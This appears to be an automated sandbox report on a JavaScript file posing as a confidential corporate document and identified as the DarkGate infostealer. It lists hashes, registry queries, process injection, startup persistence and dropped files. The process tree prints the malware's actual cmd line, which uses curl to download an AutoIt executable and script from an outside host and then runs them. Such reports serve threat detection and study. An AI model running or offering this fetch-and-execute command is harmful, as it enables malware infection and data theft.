darkgate | d2dcaec93d82105a85aa59a8c4bc3fb68cd84eefd9bac9caec917a6554ef63fe

Analysis

max time kernel
149s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
18-10-2023 07:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Navigating_Our_Evolution_October_2023_Confidential.js
Size

50KB
MD5

e65b29d3b1c48e5ca3d77588e6375382
SHA1

ef407527c8228d8a1b7bc1ec5c1c4000464498ad
SHA256

1706dccb08d8fa1a4e38ae118a4137c0ab4bb6b906eef24693a422a30b465e2d
SHA512

d2fb401af2cf8a4d5c152dfceead38b0693103e100dafa060f6bde0a3241aa3061892bede91bb71255cd608c4200f93131e2fbdb58895620a3bf1591ddfb87e2
SSDEEP

768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3Cj0yFUK:nAIMFFdYMxAcEQDg

Score

10^/10

darkgate stealer

Malware Config

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 4472 created 2676	4472	Autoit3.exe	36
PID 2516 created 3720	2516	MicrosoftEdgeUpdate.exe	40

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agefdda.lnk	MicrosoftEdgeUpdate.exe

Executes dropped EXE 1 IoCs

pid	Process
4472	Autoit3.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Autoit3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Autoit3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MicrosoftEdgeUpdate.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4472	Autoit3.exe
4472	Autoit3.exe
4472	Autoit3.exe
4472	Autoit3.exe
2516	MicrosoftEdgeUpdate.exe
2516	MicrosoftEdgeUpdate.exe
2516	MicrosoftEdgeUpdate.exe
2516	MicrosoftEdgeUpdate.exe
3504	MicrosoftEdgeUpdate.exe
3504	MicrosoftEdgeUpdate.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2516	MicrosoftEdgeUpdate.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 3044 wrote to memory of 3356	3044	wscript.exe	82
PID 3044 wrote to memory of 3356	3044	wscript.exe	82
PID 3356 wrote to memory of 3628	3356	cmd.exe	84
PID 3356 wrote to memory of 3628	3356	cmd.exe	84
PID 3356 wrote to memory of 1536	3356	cmd.exe	85
PID 3356 wrote to memory of 1536	3356	cmd.exe	85
PID 3356 wrote to memory of 4472	3356	cmd.exe	86
PID 3356 wrote to memory of 4472	3356	cmd.exe	86
PID 3356 wrote to memory of 4472	3356	cmd.exe	86
PID 4472 wrote to memory of 2516	4472	Autoit3.exe	87
PID 4472 wrote to memory of 2516	4472	Autoit3.exe	87
PID 4472 wrote to memory of 2516	4472	Autoit3.exe	87
PID 4472 wrote to memory of 2516	4472	Autoit3.exe	87
PID 2516 wrote to memory of 3504	2516	MicrosoftEdgeUpdate.exe	93
PID 2516 wrote to memory of 3504	2516	MicrosoftEdgeUpdate.exe	93
PID 2516 wrote to memory of 3504	2516	MicrosoftEdgeUpdate.exe	93
PID 2516 wrote to memory of 3504	2516	MicrosoftEdgeUpdate.exe	93

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2676
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops startup file
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of WriteProcessMemory
  PID:2516

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3720
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:3504

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Navigating_Our_Evolution_October_2023_Confidential.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o pfdyfu.au3 http://hgfdytrywq.com:80/msidvdogqzm & Autoit3.exe pfdyfu.au3
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3356
- - C:\Windows\system32\curl.exe
    curl -o Autoit3.exe http://hgfdytrywq.com:80
    3⤵
    PID:3628
- - C:\Windows\system32\curl.exe
    curl -o pfdyfu.au3 http://hgfdytrywq.com:80/msidvdogqzm
    3⤵
    PID:1536
- - C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
    Autoit3.exe pfdyfu.au3
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ecbaehe\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\ProgramData\ecbaehe\ebfcdkf\agbkkaa

Filesize
166B

MD5
b840e69cfa7a6ee1ec46ab82fd0bf19d

SHA1
29a858c1e0ec934386a3853b7e2bf7cf715dbc2d

SHA256
af90de19c4a04247a80e88689f7d5582e2c08cd27ec6ab8e288407c7b8555f96

SHA512
8113e382050d923dfb2c24163adbcc310d975d9142fe7b42a69a4c5629c5d16962b13b4af65405caf1ed5a639d4fca0d9b2256889ce4cb31cc03eeb7517130e1

Download Submit
C:\ProgramData\ecbaehe\ebfcdkf\agbkkaa

Filesize
166B

MD5
b840e69cfa7a6ee1ec46ab82fd0bf19d

SHA1
29a858c1e0ec934386a3853b7e2bf7cf715dbc2d

SHA256
af90de19c4a04247a80e88689f7d5582e2c08cd27ec6ab8e288407c7b8555f96

SHA512
8113e382050d923dfb2c24163adbcc310d975d9142fe7b42a69a4c5629c5d16962b13b4af65405caf1ed5a639d4fca0d9b2256889ce4cb31cc03eeb7517130e1

Download Submit
C:\ProgramData\ecbaehe\fehdahf.au3

Filesize
485KB

MD5
d53f05550211535178a23ba86edd7388

SHA1
68d2d61732e8c2b2ad875d1e2ad9f39f190914b4

SHA256
bd7a4b0aa4d06dba3f8aa33277f016d018313ee09eee2696a565f60469ea589d

SHA512
b00445bb380ed158907302ecc0b18e10194074f4c3dac83b139fbba47c243d60ea46e55d711c09200301e3cb447abe93ffe5997b3611fb811fb323f07949889d

Download Submit
C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

Filesize
872KB

MD5
c56b5f0201a3b3de53e561fe76912bfd

SHA1
2a4062e10a5de813f5688221dbeb3f3ff33eb417

SHA256
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

SHA512
195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\pfdyfu.au3

Filesize
485KB

MD5
d53f05550211535178a23ba86edd7388

SHA1
68d2d61732e8c2b2ad875d1e2ad9f39f190914b4

SHA256
bd7a4b0aa4d06dba3f8aa33277f016d018313ee09eee2696a565f60469ea589d

SHA512
b00445bb380ed158907302ecc0b18e10194074f4c3dac83b139fbba47c243d60ea46e55d711c09200301e3cb447abe93ffe5997b3611fb811fb323f07949889d

Download Submit
C:\temp\habbfch

Filesize
4B

MD5
1788f11aeb121e509f01b4817c859109

SHA1
9c961d98a96b584e446245f6b659b36304a770d9

SHA256
d8d8a5e7d23fa487cd8307da639ed731fcceb82569bb53cf1e04ce372a25161a

SHA512
d75f9f6bc29ff229c3213d4658e517c597a0e9c7fd3b792fde5087a9641290f0ff68f9c7faa92596f8541bf990f4114f72fa7f54e2046315ea1f7231c099dc1e

Download Submit
\??\c:\temp\fehdahf.au3

Filesize
485KB

MD5
d53f05550211535178a23ba86edd7388

SHA1
68d2d61732e8c2b2ad875d1e2ad9f39f190914b4

SHA256
bd7a4b0aa4d06dba3f8aa33277f016d018313ee09eee2696a565f60469ea589d

SHA512
b00445bb380ed158907302ecc0b18e10194074f4c3dac83b139fbba47c243d60ea46e55d711c09200301e3cb447abe93ffe5997b3611fb811fb323f07949889d

Download Submit
memory/2516-22-0x0000000001300000-0x0000000001367000-memory.dmp

Filesize
412KB

Download
memory/2516-33-0x0000000001300000-0x0000000001367000-memory.dmp

Filesize
412KB

Download
memory/2516-23-0x0000000001300000-0x0000000001367000-memory.dmp

Filesize
412KB

Download
memory/2516-42-0x0000000001300000-0x0000000001367000-memory.dmp

Filesize
412KB

Download
memory/2516-16-0x0000000001300000-0x0000000001367000-memory.dmp

Filesize
412KB

Download
memory/2516-30-0x0000000001300000-0x0000000001367000-memory.dmp

Filesize
412KB

Download
memory/2516-31-0x0000000001300000-0x0000000001367000-memory.dmp

Filesize
412KB

Download
memory/2516-21-0x0000000001300000-0x0000000001367000-memory.dmp

Filesize
412KB

Download
memory/2516-15-0x0000000001300000-0x0000000001367000-memory.dmp

Filesize
412KB

Download
memory/3504-36-0x0000000001110000-0x0000000001177000-memory.dmp

Filesize
412KB

Download
memory/3504-43-0x0000000001110000-0x0000000001177000-memory.dmp

Filesize
412KB

Download
memory/4472-9-0x0000000003CB0000-0x0000000003FE2000-memory.dmp

Filesize
3.2MB

Download
memory/4472-6-0x0000000000AF0000-0x0000000000EF0000-memory.dmp

Filesize
4.0MB

Download
memory/4472-25-0x0000000003CB0000-0x0000000003FE2000-memory.dmp

Filesize
3.2MB

Download